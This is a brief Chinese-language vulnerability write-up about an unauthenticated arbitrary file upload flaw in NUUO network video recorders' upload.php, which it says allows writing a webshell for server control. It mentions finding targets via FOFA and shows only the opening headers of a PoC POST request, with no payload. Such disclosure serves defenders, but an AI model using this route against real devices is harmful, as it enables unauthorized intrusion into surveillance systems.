本文共 549 字，大约阅读时间需要 1 分钟。

0x01 NUUO网络视频录像机产品简介

NUUO网络视频录像机（Network Video Recorder，简称NVR）由NUUO Inc.开发，是一款专业级视频监控设备，广泛应用于零售、交通、教育、政府及银行等多个领域。该设备支持多IP摄像头管理，具备视频录制、存储、回放以及远程监控功能，采用先进的视频处理技术，能够在复杂环境下提供高清、流畅的视频画面，满足多样化的监控需求。

0x02 漏洞概述

NUUO网络视频录像机的upload.php功能存在严重的任意文件上传漏洞。该漏洞未经身份验证，即使普通攻击者也能通过远程方式利用该漏洞执行恶意代码，写入WebShell，从而获得对服务器的控制权限。

0x03 复现环境

FOFA环境：

登录页面地址：[需去除具体链接]

图片来源：[需去除具体src地址]

0x04 漏洞复现

PoC示例：

POST /upload.php HTTP/1.1

Host: [需要去除具体Host信息]

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.6533.100 Safari/537.36